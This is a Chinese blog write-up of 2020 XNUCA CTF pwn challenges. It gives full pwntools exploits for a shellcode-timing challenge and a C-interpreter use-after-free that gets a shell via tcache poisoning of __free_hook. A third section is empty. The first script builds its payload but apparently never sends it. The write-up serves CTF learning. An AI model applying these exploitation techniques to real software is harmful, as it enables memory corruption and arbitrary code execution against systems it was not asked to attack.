2020XNUCA

2020 XNUCA CTF，题量较大 也很难。后面如果有参考，会接着复现其他题目

koh_defile

程序分析

这道题在线下赛是一道 koh题目，得分标准为成功获得flag后，比较所用shellcode的长度。

程序总体流程是 使用 mmap创建了一个 0x4096的堆空间。然后读取用户输入的 shellcode到堆的 前 0x2047空间内。然后将该shellcode拷贝到堆的 后 0x2047堆空间内。然后创建了一个子进程，子进程会循环轮流跳到 堆空间的前后 两段 shellcode空间内执行。

        while (1)
        {
#ifdef DEBUG
            printf("Fork!%d\n", i);
#endif
            execpid = fork();
            if (execpid == -1)
            {
#ifdef DEBUG
                printf("ForkErr.\n");
#endif
                exit(0);
            }
            else if (execpid == 0)
            {
                prctl(PR_SET_PDEATHSIG, SIGKILL);
#ifdef MULTI
                usecpu(cpus - 1);
#endif
                do_seccomp();
                uint64_t targetaddr = (uint64_t)shared + (i % 2) * ((4096 - 2) / 2);
                __asm__(
                    "mov $0xdeadbeefdeadbeef, %%rax\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rbx\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rcx\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rdi\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rsi\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r8\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r9\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r10\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r11\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r12\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r13\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r14\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r15\n\t"
                    "jmp *%%rdx\n\t"
                    :
                    :"d"(targetaddr)
                    :
                );
                exit(0);
            }
            else
            {
                waitpid(execpid, NULL, 0);
            }
            i++;
        }
    }

而另一个进程会先读取随机数到 key中，然后 不断比较 shared+4095处的数据与 key[i]的值。如果比较不正确，则会一直循环等待。如果比较正确，则会将shared+offset处的值修改为 0xcccccccccccccccc。同时接着判断 shared+0x4094处的值是否为1，为1则继续等待，不为1则继续执行。 比较正确128次，则结束比较。

        // This process is handler.
        char key[KEYLENGTH];
        int i = 0;
        uint64_t offset;
        read(randfd, key, KEYLENGTH);
        close(pipefd[1]);
#ifdef MULTI
        usecpu(0);
#endif
        for (i = 0; i < KEYLENGTH; i++)
        {
            printf("Round:\t%d\n", i);
            offset = urand() % (4096 - 2 - 8);
            offset &= 0xfffffffffffffff8;

#ifdef DEBUG
            printf("Key:\t%hu\n", (uint8_t)key[i]);
            printf("Change:\t%d\n", offset);
            uint64_t *saved = (uint64_t *)((char *)shared + offset);
            mfence();
            printf("Before:\t%llx\n", *saved);
            mfence();
            printf("------------\n");
#endif
            *((uint8_t *)shared + 4094) = 0;
            while (1)
            {
                if (*((char *)shared + 4095) == key[i])
                {
                    mfence();
                    *(uint64_t *)((char *)shared + offset) = 0xcccccccccccccccc;
                    break;
                }
            }
            mfence();
            while (*((uint8_t *)shared + 4094) != 1)
                ;
            mfence();
#ifdef DEBUG
            printf("After:\t%llx\n", *saved);
            printf("------------\n\n\n");
#endif
            mfence();
        }

比较完成后，程序最后会从 管道 pipefd[0]中读取 数据，与 key进行比较，比较成功则输出 flag。

char answer[KEYLENGTH];
memset(answer, 0, KEYLENGTH);
read(pipefd[0], answer, KEYLENGTH);
if (memcmp(key, answer, KEYLENGTH) == 0)
{
    printf("SUCCEED\n");
    flag();
}
else
{
    printf("FAIL\n");
}
exit(0);

利用分析

通过上面分析，可以看到我们主要的目标就是 爆破出 key值，输入管道，来得到flag。

但是，我们有几个困难：

• 每一位key，爆破成功后，输入的shellcode会被随机修改，所以需要我们对shellcode自行修复
• 如何判断爆破成功，当我们爆破成功后，堆空间会有 0xcccccccccccccccc,可以通过查找该字符串来判断爆破成功
• 需要在最后父进程读取管道前，将所有爆破的字符写入管道，这里我们利用 上面比较时 shared+0x4094这个标志位来lock父进程

所以，我们的shellcode需要依次完成如下功能：

1. 爆破 shared+0x4095

   通过不断增加 bl的值，并赋值给 [rdx+0xfff]即 shared+4095处的值。然后调用 check进行判断是否 比较爆破成功。

loop_:
    call check
    mfence
	call check
	cmpw cx,0x200
	jne find
	inc bl
	mfence
	mov byte ptr [rdx+0xfff],bl
	mfence
	cmpb bl,0
	jne loop_

2. 寻找 0xcccccccccccccccc

find_cc:
	movabsq	r11,-3689348814741910324
	cmpq qword ptr [rdx + rcx*8],r11
	je find_
	inc rcx
	cmpw cx,0x200
	jne find_cc
	ret
find_:
	ret

3. 修复 shellcode

   通过第2步找到的 [rdx+rcx*8]位置为 0xcccccccccccc，并将 [rdx+rax*8]修复 shellcode.

mov r11,[rdx+rax*8]
mov qword ptr [rdx+rcx*8],r11
push rbx
mov rsi,rsp
mov edi,4
mov r12,rdx

4. 写入管道

//write()
	xor rdx,rdx
	inc rdx
	mov rax,rdx
	syscall

	mov byte ptr [r12+0xffe],1

	xor rdi,rdi
	mov rax,0xe7
	syscall

EXP

from pwn import *
context.log_level='debug'
context.arch='amd64'
context.terminal=(['tmux', 'splitw', '-h'])
def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def main(host,port=40001):
    global p
    shellcode=code = """
    	and rdx,0xfffffffffffff000
    	add rdx,0xe
    	jmp rdx
    	xor rbx,rbx
    	xor rax,rax
    	and rdx,0xfffffffffffff000
    	mfence
    	mov byte ptr [rdx+0xfff],bl
    	mfence
    	mfence
    loop_:
        call check
        mfence
    	call check
    	cmpw cx,0x200
    	jne find
    	inc bl
    	mfence
    	mov byte ptr [rdx+0xfff],bl
    	mfence
    	cmpb bl,0
    	jne loop_
    find:
    	mov ax,cx
    	cmpw cx,0x100
    	jle l1
    	sub ax,0x100
    	jmp l2
    l1:
    	add ax,0x11A
    l2:
    	mov r11,[rdx+rax*8]
    	mov qword ptr [rdx+rcx*8],r11
    	push rbx
    	mov rsi,rsp
    	mov edi,4
    	mov r12,rdx

    	xor rdx,rdx
    	inc rdx
    	mov rax,rdx
    	syscall

    	mov byte ptr [r12+0xffe],1

    	xor rdi,rdi
    	mov rax,0xe7
    	syscall
    check:
    	xor rcx,rcx
    find_cc:
    	movabsq	r11,-3689348814741910324
    	cmpq qword ptr [rdx + rcx*8],r11
    	je find_
    	inc rcx
    	cmpw cx,0x200
    	jne find_cc
    	ret
    find_:
    	ret
    """

    code = asm(shellcode).ljust(207, '\x90')
    payload = p64(416)+'\x90'+code+'\x90'*2+code[:-11]+'\x00'*10

    if host:
        p=remote(host,port)
    else:
        p=process(["./defile", "./shellcode"])

    p.recvuntil(":")

    p.interactive()

if __name__ == '__main__':
    for i in range(0x80):
        try:
            print('time:',i)
            main(0)
        except:
            p.close()

ParseC

第一次做解释器类型的题目，这类题目就是代码量大且程序逻辑十分复杂。我们需要理解程序的输入格式和程序的逻辑。但是，总结的问题感觉是 需要重点关注 malloc 和 free 这类函数，还有就是考虑栈溢出和堆溢出。这道题就是一道 UAF 类型的题目。

程序分析

程序给了源码，那么就可以对源码进行编译。后续加载源码进行调试，对于调试更加方便。程序总体是自己实现了一个 C 的解释器。通过动态调试，可以发现程序中结构体 symbol的成员作用。当 是一个 字符变量时， funcp会存储 字符存储的堆地址，value会存储 字符的长度，type会是 Str类型，name存储 变量名字。当是一个 数组变量时，value会存储数组的个数，funcp会存储数组的 堆地址。

/* this structure represent a symbol store in a symbol table */
typedef struct symStruct {  
    int type;                  //the type of the symbol:  Num, Char, Str, Array, Func
    char name[MAXNAMESIZE];    // record the symbol name
    double value;              // record the symbol value, or the length of string or array              
    union {
        char* funcp;            // pointer to an array or an function
        struct symStruct* list;
    } pointer;
    int levelNum;               // indicate the declare nesting level
} symbol;

当对一个已经赋值的字符变量，再次输入字符时，其会先对新字符串申请堆空间，然后释放原有的字符串所在的堆空间。字符串的堆申请代码如下：

else if (token == '"' ) {               // parse string
    last_pos = src;
    char tval;
    unsigned int numCount = 0;
    while (*src != 0 && *src != token) {
        src++;
        numCount++;          
    }
    if (*src) {
        token_val.ptr = malloc(sizeof(char) * numCount + 8);    //alloc string buffer
        if (!token_val.ptr)
            error("Malloc error\n");
        strncpy((char*)token_val.ptr, last_pos,numCount);
        src++;
    }
    token = Str;
    return;
}

而当有更新字符变量内容时，其释放堆块代码如下：

match('=');
if (token == Str) {
    if (s->pointer.funcp)
        free(s->pointer.funcp);         //uaf
    s->pointer.funcp = (char*)token_val.ptr;
    s->type = StrSym;
    match(Str);
}

而这里存在一个逻辑漏洞，当将一个变量赋值给另一个变量时，其会共用一个变量对象。如下代码所示。这里 s0的初始堆空间为 0x20，然后 s1被赋值为 s0，那么 s1就会指向 s0所在的 0x20的地址。然后 s0被赋值了新的字符串，其会 先申请 0x30的堆空间，然后释放 0x20的旧堆，最后 s0指向了 0x30堆地址。而 这里 s1仍然指向了已经被释放的 0x20堆地址。所以，存在一个 UAF漏洞。

s0="aaaaaaaa";
s1=s0;
s0="aaaaaaaaaaaaaaaaaaaaaaaa";

数组分配代码如下，数组中的每个成员都用一个 symStruct结构体表示，程序会为数组 申请一个总体空间，大小为 sizeof(struct symStruct) * length + 1，length表示 数组的成员个数。每个 symStruct结构大小为 0x50。

else if (token == Array) {
    match(Array);
    symbol* s = token_val.ptr;
    match(Sym);
    match('(');
    int length = (int)expression();
    match(')');
    s->pointer.list = (symbol*)malloc(sizeof(struct symStruct) * length + 1);
    if (!s->pointer.list)
        error("Malloc error\n");
    for (int i = 0; i < length; ++i)
        s->pointer.list[i].type = Num;
    s->value = length;
    s->type = ArraySym;
    match(';');
}

然后，程序中有 puts和 read功能，puts可以将字符或数组中的内容输出。read可以读取 0x20的字符，但是其 只会将 value的值赋值为 输入的 浮点数。根据调试，如果使用 read读取到 数组变量时，其会赋值到 数组成员结构 symStruct的 0x28的偏移处。

case Puts: 
    if (token == StrSym){
        printf("%s\n", token_val.ptr->pointer.funcp);
        match(StrSym);
    }
    else{
        printf("%s\n", (char*)token_val.ptr);
        match(Str);
    }
    break;
case Read:
    read(0,t,0x20);
    token_val.ptr->value = atof(t);
    //scanf("%lf", &token_val.ptr->value);
    token_val.ptr->type = Num;
    match(Sym);
}

利用分析

1. 泄露地址

由于存在 UAF漏洞，所以可以创建一个长为 0xc0的字符，随后使用 UAF对其释放8次，即可释放到 unsortedbin。然后使用 puts将 libc地址泄露出来；

2. 劫持 free_hook

这里 getshell的方法就是 劫持 free_hook。初始想法是通过 tcache来劫持，但是这里我们使用 read函数输入时，并不能直接将 数据输入到 字符或数组堆块的 开始地址处，而是输入到 偏移 0x28的地址处。所以，我们需要先构造一个堆块错位。

先构造一个 0x20堆块的double free和一个 0x50的 double free，如下所示：

tcachebins
0x20 [  2]: 0x56259316f730 ◂— 0x56259316f730
0x50 [  2]: 0x56259316f750 ◂— 0x56259316f750

随后，将 0x20堆块 fd指向 0x50堆块，如下所示：

tcachebins
0x20 [  1]: 0x55d5c58a5730 —▸ 0x55d5c58a5750 
0x50 [  2]: 0x55d5c58a5750 ◂— 0x55d5c58a5750

然后，分配 0x20堆块来 将 0x50堆块的 fd指向 其偏移 0x28的地址处：

tcachebins
0x20 [ -1]: 0x562e5d88a750
0x50 [  2]: 0x562e5d88a750 —▸ 0x562e5d88a778

最后，分配一个 数组空间 0x50，使用 read函数输入 free_hook-0x28地址进入 数组内，其会被存储到 0x50堆块偏移 0x78地址，那么此时 free_hook-0x28地址就进入了 0x50的 tcache链

tcachebins
0x20 [ -1]: 0x5596499ff750
0x50 [  1]: 0x5596499ff778 —▸ 0x7f94bb6ec8c0 (_IO_stdfile_1_lock)

然后，分配一个 0x50堆块后，再分配一个数组空间，使用 read函数输入 system地址，此时 free_hook就被改为 system地址

注意：由于这里只能输入 浮点数，所以我们需要将 free_hook和 system地址都转为 浮点数输入。

EXP

from pwn import *
import binascii
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1

payload = '''top0="tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt";
t1="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";

//0x20 chunk 
x1="xxxxxxxx";
x2=x1;
x3=x1;

//0x50 chunk
s1="sssssssssssssssssssssssssssssssssssssssssssssssssss";
s2=s1;
s3=s1;

//0xc0 leak addr
t2=t1;
t3=t1;
t4=t1;
t5=t1;
t6=t1;
t7=t1;
t8=t1;
t9=t1;
t1="11111111111111111111111111111111";
t2="22222222222222222222222222222222";
t3="33333333333333333333333333333333";
t4="44444444444444444444444444444444";
t5="55555555555555555555555555555555";
t6="66666666666666666666666666666666";
t7="77777777777777777777777777777777";
t8="88888888888888888888888888888888";
puts(t9);
//t10="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";

//0x20 double free
x1="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
x2="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";

//0x50 double free
s1="sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss";
s2="sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss";
bin = "/bin/sh;aaaaaaaaaaaaaaaaaaaaa";

//change ox20 to 0x50
a1="P";
//change 0x50 to 0x78
a2="22222222";
a3="x";

//malloc arr
array arr(1);

//get free_hook
read(n);
arr[0]=n;
z="ssssssssssssssssssssssssssssssssssssssssssssssssssssssss";

//malloc free_hook
array frr(1);

//get system
read(v);
frr[0]=v;

//getshell
bin="111111111111111111111111";
'''

fd = open("./exp", "w")
fd.write(payload)
fd.close()

if debug == 1:
    p = process(['./ParseC','exp'])
    libc = ELF(libcname)
    elf = ELF('./ParseC')
else:
    p = remote()
    
def double_float(value):
    return str(struct.unpack('!d', p64(value)[::-1])[0])

def Pwn():
    gdb.attach(p, "bp $rebase(0x1281)")
    libc_addr = u64(p.recv(6).ljust(8, b'\x00'))
    libc.address = libc_addr-0x10-libc.sym['__malloc_hook']-0x100-0x10
    print("libc_base:",hex(libc.address))

    free_hook = libc.sym['__free_hook']
    system = libc.sym['system']
    print('system:',hex(system))

    print('free_hook:',hex(free_hook))
    raw_input()
    p.sendline(double_float(libc.sym['__free_hook'] - 0x28))
    raw_input()

    p.sendline(double_float(libc.sym['system']))


    p.interactive()

Pwn()

C++

程序分析

利用分析

EXP

赏

只要你支持她，我们就是好朋友2333

支付宝

微信

• 本文作者： A1ex
• 本文链接： http://yoursite.com/2020/12/19/2020XNUCA/
• 版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！